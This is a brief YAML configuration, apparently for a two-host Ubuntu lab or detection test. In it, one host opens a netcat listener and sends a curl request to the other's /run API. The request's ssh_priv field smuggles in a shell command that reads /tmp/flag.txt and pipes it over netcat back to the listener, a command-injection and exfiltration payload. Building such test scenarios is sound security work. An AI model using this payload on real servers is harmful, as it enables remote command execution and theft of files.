blueprint: ubuntu2204-ubuntu2204
ubuntu1:
  trace: nginx
  playbook: ubuntu1.yml
ubuntu2:
  command: 
    - "nc -nvlp 9000&"
    - "curl -i %ubuntu1%:8000/run -H \"Content-type: application/json\" -d '{\"client\":\"ssh\",\"tgt\":\"A\",\"fun\":\"B\",\"eauth\":\"C\",\"ssh_priv\":\"| cat /tmp/flag.txt | nc -u -q 0 %ubuntu2% 9000  #\"}'"
